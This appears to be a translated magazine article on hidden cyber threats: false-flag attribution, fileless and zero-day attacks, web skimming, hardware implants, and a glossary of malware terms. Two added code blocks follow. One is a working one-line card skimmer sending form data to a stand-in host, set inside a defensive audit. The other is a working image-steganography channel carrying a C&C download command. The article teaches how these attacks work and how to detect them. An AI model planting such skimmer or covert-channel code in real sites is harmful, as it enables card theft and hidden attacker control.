How did a certain Japanese minister surprise the hackers?

The number of ways of hiding, disguising and misleading the enemy - whether in cybercrime or in cyberwarfare - is growing inexorably. Today hackers very rarely reveal what they have done, whether for fame or for business.

The series of technical failures during the opening ceremony of last year's Winter Olympics in Korea was the result of a cyberattack. The Guardian reported that the unavailability of the Games' website, the Wi-Fi outage in the stadium and the dead televisions in the press room were the result of a far more sophisticated attack than originally thought. The attackers had gained access to the organizers' network well in advance and, despite numerous security measures, disabled many computers in a very cunning way.

Until its effects became visible, the enemy was invisible, and even once the damage was seen, the enemy largely remained so (1). There were several theories about who was behind the attack. According to the most popular one, the traces led to Russia; some commentators saw it as revenge for the exclusion of Russian national symbols from the Games.

Other suspicions were directed at North Korea, which is always looking for a way to needle its southern neighbour, or at China, a hacking power that is often among the suspects. But all this was detective-style deduction rather than a conclusion based on irrefutable evidence, and in most such cases we are doomed to exactly this kind of speculation.

As a rule, establishing the authorship of a cyberattack is a difficult task. Not only do the perpetrators usually leave no recognizable traces, they also plant misleading clues in their tools and methods.

This was the case with the attack on Polish banks at the beginning of 2017. BAE Systems, which was the first to describe the high-profile attack on Bangladesh Bank, carefully examined some elements of the malware that targeted computers in Polish banks and concluded that its authors were trying to pass themselves off as Russian speakers.

Elements of the code contained Russian words with strange transliteration, for example the Russian word for "client" in an unusual form. BAE Systems suspects that the attackers used Google Translate to imitate Russian hackers using Russian vocabulary.

In May 2018, Banco de Chile acknowledged that it was having problems and recommended that customers use online and mobile banking services and ATMs instead. On the screens of computers in its branches, experts found signs of damage to the boot sectors of the disks.

After several days of investigating the network, traces were found confirming that massive disk corruption had indeed taken place on thousands of machines. According to unofficial information, around 9,000 computers and 500 servers were affected.

Further investigation revealed that, at the time of the attack, 11 million had disappeared from the bank, and other sources point to an even larger sum. Security experts eventually concluded that the damaged disks on the bank's computers were simply a diversion covering the theft. The bank, however, has not officially confirmed this.

Zero days to prepare and zero files

Over the past year, almost two-thirds of the world's largest companies have been successfully attacked by cybercriminals, who most often used techniques based on zero-day vulnerabilities and so-called fileless attacks.

These are the findings of the State of Endpoint Security Risk report prepared by the Ponemon Institute on behalf of Barkly. Both techniques are varieties of the invisible enemy, and both are gaining in popularity.

According to the study's authors, in the last year alone the number of attacks on the world's largest organizations has increased by 20%. The report also states that the average loss from such actions is estimated at $7.12 million per organization, which works out to $440 per attacked endpoint. These amounts include both the direct losses caused by the criminals and the cost of restoring the attacked systems to their original state.

Zero-day attacks are extremely difficult to counter, because they rely on software vulnerabilities that neither the vendor nor the users are aware of. The former cannot prepare the appropriate security update, and the latter cannot put the appropriate protective procedures in place.

"As many as 76% of successful attacks were based on the exploitation of zero-day vulnerabilities or some previously unknown malware, which means that they were four times more effective than the classic techniques previously used by cybercriminals," the Ponemon Institute representatives explain.

The second invisible method, the fileless attack, consists of running malicious code on the system through various "tricks" (for example, an exploit delivered through a website) without requiring the user to download or run any file.

Criminals are using this method more and more often, because classic attacks that send users malicious files (such as Office documents or PDF files) are becoming less and less effective. Fileless attacks usually rely on software vulnerabilities that are already known and patched; the problem is that many users do not update their applications often enough.

Unlike the classic scenario, the malware does not place an executable on disk. Instead, it runs in the computer's memory (RAM).

This means that traditional antivirus software has a hard time detecting the infection, because there is no file on disk for it to find. Using such malware, an attacker can hide his presence on the computer without raising an alarm and cause various kinds of damage (stealing information, downloading additional malware, escalating privileges, and so on).

Fileless malware is also called an advanced volatile threat (AVT). Some experts say it is even worse than an advanced persistent threat (APT).

2. Information about the hacked site

When HTTPS Doesn't Help

The days when criminals took control of a site and replaced its home page with a notice in large print (2) seem to be gone for good.

Today the goal of attacks is above all to obtain money, and criminals use every method to extract tangible financial benefit from any situation. After taking over a site, they try to remain hidden for as long as possible, and either make a profit from it or use the captured infrastructure.

Injecting malicious code into poorly protected websites can serve various purposes, including financial ones (theft of credit card data). We once wrote about Bulgarian scripts injected into the website of the Office of the President of the Republic of Poland, but it was not possible to say clearly what the purpose of the links to foreign fonts was.

A relatively new method is so-called web skimming, that is, overlays that steal credit card numbers on online store pages. Users have been trained to check whether a site uses HTTPS (3) and has the characteristic padlock symbol, and the mere presence of the padlock has come to be taken as proof that there is no threat.

3. Designation of HTTPS in the Internet address

Criminals exploit this over-reliance on the site's security in several ways: they obtain free certificates so that the padlock appears, place a padlock-shaped favicon on the page, and inject malicious code into the site's source code.

An analysis of the infection methods used against some online stores shows that attackers have carried the physical skimmers known from ATMs over into the cyber world in the form of web skimmers. When paying for a purchase, the customer fills out a payment form in which he enters all the card data (card number, expiry date, CVV, first and last name).

Payment is authorized by the store in the usual way, and the entire purchase process completes correctly. With web skimming, however, code (a single line of JavaScript is enough) is injected into the store's page that causes the data entered in the form to also be sent to the attackers' server.
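The mechanism described above, as an added example that is not part of the original article: a constructed checkout page carrying a one-line skimmer of the kind described, plus a small static audit that flags inline scripts which read form data and contact a foreign origin, and checks whether the page's Content-Security-Policy would block that request. It is plain Node.js with no dependencies; the hostnames (`shop.example-store.test`, `stats-collect.invalid`), the sample HTML and the audit functions are all assumptions made for illustration.

```javascript
// Added example, not code from the original article: a constructed checkout page
// carrying a one-line web skimmer, and a small static audit that (1) flags inline
// scripts which read form data and contact a foreign origin and (2) checks whether
// the page's Content-Security-Policy would block that request. Plain Node.js, no
// dependencies. All hostnames are fictitious and the HTML below is constructed.

const PAGE_ORIGIN = 'https://shop.example-store.test'; // assumed store origin

// Constructed checkout page: a legitimate app script plus one injected skimmer line.
// The skimmer fires on submit, so the real payment still goes through normally.
const SAMPLE_CHECKOUT_HTML = `
<html><head>
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self' https://cdn.example-store.test; connect-src 'self' https://pay.example-store.test">
</head><body>
<form id="checkout" action="/pay" method="post">
  <input name="cc_number"><input name="cc_exp"><input name="cc_cvv"><input name="holder">
</form>
<script src="https://cdn.example-store.test/app.js"></script>
<script>document.querySelector('#checkout').addEventListener('submit',function(e){navigator.sendBeacon('https://stats-collect.invalid/s',new URLSearchParams(new FormData(e.target)))});</script>
</body></html>`;

// Bodies of inline <script> elements (those without a src attribute).
function extractInlineScripts(html) {
  const re = /<script(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1].trim());
  return out;
}

// Absolute URLs mentioned in a script body.
function extractUrls(script) {
  return script.match(/https?:\/\/[^\s'"`)]+/g) || [];
}

// Heuristic: does the script read form fields the way a skimmer must?
function readsFormData(script) {
  return /\bFormData\b|\.value\b|\bquerySelector(?:All)?\(\s*['"](?:input|form|#)/.test(script);
}

// Parse a <meta http-equiv="Content-Security-Policy"> tag into {directive: [sources]}.
function parseCsp(html) {
  const m = html.match(/http-equiv="Content-Security-Policy"\s+content="([^"]+)"/i);
  if (!m) return null;
  const policy = {};
  for (const part of m[1].split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name] = sources;
  }
  return policy;
}

// Would this CSP allow a fetch/XHR/sendBeacon to `url`? connect-src governs those,
// falling back to default-src; no policy at all means everything is allowed.
// Simplified source matching: '*', 'self', 'none', "*.host" wildcards and exact origins.
function cspAllowsConnect(policy, url, pageOrigin) {
  if (!policy) return true;
  const sources = policy['connect-src'] || policy['default-src'] || ['*'];
  const target = new URL(url);
  return sources.some((src) => {
    if (src === '*') return true;
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === pageOrigin;
    if (src.startsWith('*.')) return target.hostname.endsWith(src.slice(1));
    try { return new URL(src).origin === target.origin; } catch (e) { return false; }
  });
}

// Audit: every inline script that reads form data and names a foreign origin is a
// finding; each finding records whether the CSP would have stopped the exfiltration.
function auditCheckoutPage(html, pageOrigin) {
  const policy = parseCsp(html);
  const findings = [];
  for (const script of extractInlineScripts(html)) {
    if (!readsFormData(script)) continue;
    for (const url of extractUrls(script)) {
      if (new URL(url).origin === pageOrigin) continue;
      findings.push({ url, blockedByCsp: !cspAllowsConnect(policy, url, pageOrigin), snippet: script.slice(0, 60) });
    }
  }
  return findings;
}

console.log(JSON.stringify(auditCheckoutPage(SAMPLE_CHECKOUT_HTML, PAGE_ORIGIN), null, 2));
```

Two caveats a practitioner will want. A policy carried in a `<meta>` tag, as in the sample, can itself be rewritten by whoever injects the skimmer, so the CSP to rely on is the one sent as an HTTP response header. And `connect-src` only covers fetch, XMLHttpRequest and sendBeacon; a skimmer can just as well leak the card data through an `<img>` request (governed by `img-src`) or by rewriting the form's `action` (governed by `form-action`), so all three directives need a tight allowlist.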

One of the best-known crimes of this type was the attack on the online store of the US Republican Party. For six months, customers' credit card details were stolen and sent to a Russian server.

Based on the store's traffic and black-market prices, it was estimated that the stolen cards brought the cybercriminals a profit of $600,000.

In 2018, the customer data of smartphone maker OnePlus was stolen in an identical way. The company admitted that its server had been infected and that credit card details were captured directly in the browser and sent to unknown criminals. The data of 40,000 customers was reportedly taken this way.

Equipment hazards

A huge and growing area of invisible cyber threats consists of all kinds of techniques based on hardware, whether in the form of chips secretly installed in seemingly harmless components or of purpose-built spy devices.

The discovery, announced in October last year by Bloomberg, of additional miniature spy chips in telecommunications equipment, including in the Ethernet ports (4) of servers used by Apple and Amazon, became a sensation in 2018. The trail led to Supermicro, whose boards are manufactured in China. However, Bloomberg's account was subsequently denied by all the parties concerned, from China to Apple and Amazon.

4. Ethernet network ports

As it turned out, "ordinary" computer hardware without any special implants can also be used in a silent attack. For example, it was found that a flaw in Intel processors, which we recently wrote about in MT, related to their ability to "predict" and speculatively execute subsequent operations, allows any software (from a database engine to simple JavaScript running in a browser) to learn the layout or even the contents of protected areas of kernel memory.

A few years ago, we wrote about equipment that makes it possible to covertly break into and spy on electronic devices. We described the roughly 50-page "ANT shopping catalog" that was available online. As Spiegel writes, it is from this catalog that intelligence agents specializing in cyber warfare choose their "weapons".

The list includes products of various classes, from the $30 LOUDAUTO acoustic bug to CANDYGRAM at $40,000, which is used to set up one's own fake GSM base station.

The list includes not only hardware but also specialized software, such as DROPOUTJEEP, which, once "implanted" in an iPhone, allows, among other things, files to be retrieved from its memory or written to it. In this way one can obtain contact lists, SMS messages and voice messages, as well as control the camera and locate the device.

Faced with the power and omnipresence of invisible enemies, one sometimes feels helpless. That is why not everyone was surprised or amused by the attitude of Yoshitaka Sakurada, the minister in charge of preparations for the Tokyo 2020 Olympics and deputy head of the government's cybersecurity strategy office, who has reportedly never used a computer.

At least he was invisible to the enemy, instead of the enemy being invisible to him.

List of terms related to the invisible cyber enemy

Backdoor – malicious software designed to covertly log into a system, device, computer or application, bypassing traditional security measures.

Bot – a single Internet-connected device infected with malware and included in a network of similar infected devices (a botnet). This is most often a computer, but it can also be a smartphone, tablet or IoT equipment (such as a router or refrigerator). It receives operating instructions from a command and control server, directly or sometimes through other members of the network, but always without the owner's knowledge or consent. Botnets can include up to a million devices and send up to 60 billion spam messages a day. They are used for fraud, manipulating online polls and social networks, and spreading spam and malware.

Cryptojacking – in 2017 a new technique for mining the Monero cryptocurrency in web browsers appeared. The script is written in JavaScript and can easily be embedded in any page. When a user visits such an infected page, the computing power of his device is used to mine cryptocurrency. The more time we spend on such websites, the more CPU cycles of our equipment a cybercriminal can use.

Dropper – malicious software that installs another type of malware, such as a virus or backdoor. Droppers are often designed to evade detection by traditional antivirus solutions, for instance through delayed activation.

Exploit – malicious code that takes advantage of a vulnerability in legitimate software to compromise a computer or system.

Keylogger – software that records keyboard input, for example the sequence of alphanumeric and special characters typed after particular keywords such as "bankofamerica.com" or "paypal.com". Running on thousands of connected computers, it allows a cybercriminal to collect sensitive information quickly.

Malware – malicious software specifically designed to harm a computer, system or data. It covers several kinds of tools, including Trojans, viruses and worms.

Phishing – an attempt to obtain sensitive or confidential information from a user of Internet-connected equipment. Cybercriminals distribute electronic content to a wide range of victims, prompting them to take a certain action, such as clicking a link or replying to an email. In doing so, the victims unwittingly hand over personal information such as usernames, passwords, bank or financial details, or credit card data. Distribution channels include email, online advertising and SMS. A variant, spear phishing, is an attack directed at specific individuals or groups, such as corporate executives, celebrities or high-ranking government officials.

Rootkit – malicious software that gives covert access to parts of a computer, software or system. It often modifies the operating system in such a way that it remains hidden from the user.

Spyware – malware that spies on a computer user, intercepting keystrokes, emails and documents, and even switching on a video camera without his knowledge.

Steganography – a method of hiding a file, message, image or video inside another file. Attackers take advantage of this technique by uploading seemingly harmless image files that carry encoded streams of messages for the C&C channel (between a computer and a server). The images may be hosted on a hacked website or even on image-sharing services.
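The entry above in working code, as an added example that is not part of the original article: least-significant-bit (LSB) steganography hiding a C&C-style message in an image. To keep it runnable offline the "image" is a constructed raw RGB pixel buffer rather than a real PNG, the message and the `c2.invalid` host in it are invented, and the function names are the author's own; a real tool would wrap this with PNG decoding and encoding.

```javascript
// Added example, not code from the original article: least-significant-bit (LSB)
// steganography, the simplest way a C&C message can be hidden in an innocent-looking
// image. To stay self-contained the "image" is a constructed raw RGB pixel buffer;
// a real tool would add PNG decoding/encoding around it. Plain Node.js.

// Constructed cover "image": 64x64 RGB gradient, one byte per channel.
function makeCoverImage() {
  const pixels = Buffer.alloc(64 * 64 * 3);
  for (let i = 0; i < pixels.length; i++) pixels[i] = (i * 7) & 0xff;
  return pixels;
}

// Constructed C&C-style message to hide (fictitious host and command).
const SECRET = 'beacon host=ws-17 cmd=download http://c2.invalid/stage2';

// Embed `payload` in the low bit of successive pixel bytes. Layout: 32-bit
// big-endian length, then the payload, MSB first. Returns a modified copy.
function lsbEmbed(pixels, payload) {
  const header = Buffer.alloc(4);
  header.writeUInt32BE(payload.length, 0);
  const data = Buffer.concat([header, payload]);
  if (data.length * 8 > pixels.length) throw new Error('cover image too small');
  const out = Buffer.from(pixels);
  for (let i = 0; i < data.length * 8; i++) {
    const bit = (data[i >> 3] >> (7 - (i & 7))) & 1;
    out[i] = (out[i] & 0xfe) | bit;
  }
  return out;
}

// Recover the hidden bytes: read the length, then that many bytes.
function lsbExtract(pixels) {
  const readByte = (bitOffset) => {
    let b = 0;
    for (let j = 0; j < 8; j++) b = (b << 1) | (pixels[bitOffset + j] & 1);
    return b;
  };
  const len = ((readByte(0) << 24) | (readByte(8) << 16) | (readByte(16) << 8) | readByte(24)) >>> 0;
  const out = Buffer.alloc(len);
  for (let k = 0; k < len; k++) out[k] = readByte(32 + k * 8);
  return out;
}

// How much did embedding change the picture? At most 1 per channel, which is
// invisible to the eye and to any scanner that only looks at the file as an image.
function maxByteDiff(a, b) {
  let max = 0;
  for (let i = 0; i < a.length; i++) max = Math.max(max, Math.abs(a[i] - b[i]));
  return max;
}

// Usage: the message round-trips, and the carrier barely changes.
const cover = makeCoverImage();
const stego = lsbEmbed(cover, Buffer.from(SECRET, 'utf8'));
console.log('recovered:', lsbExtract(stego).toString('utf8'));
console.log('max per-byte change:', maxByteDiff(cover, stego));
```

The defensive lesson is the flip side of `maxByteDiff`: a proxy or image-hosting service that re-encodes uploads (resampling, recompressing, stripping metadata) destroys the low-bit channel, which is why simple LSB hiding only survives on services that store the original bytes unchanged.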

Encryption/complex protocols – a method used by malicious code to obfuscate its transmissions. Some malware, such as certain Trojans, encrypts both the distribution of the malware and its C&C (command and control) communications.

Trojan – a form of non-replicating malware that contains hidden functionality. A Trojan usually does not try to spread or inject itself into other files.

Vishing – a combination of the words "voice" and "phishing". It means using a telephone connection to obtain sensitive personal information such as bank account or credit card numbers. Typically, the victim receives an automated message from someone claiming to represent a financial institution, an ISP or a technology company. The message may ask for an account number or PIN. Once the call is connected, it is routed through the service to the attacker, who then requests further sensitive personal data.

Business Email Compromise (BEC) – a type of attack aimed at deceiving people in a given company or organization and stealing money by impersonating its management. Criminals gain access to the corporate system through a typical attack or malware, then study the company's organizational structure, its financial systems, and the management's email style and calendar.
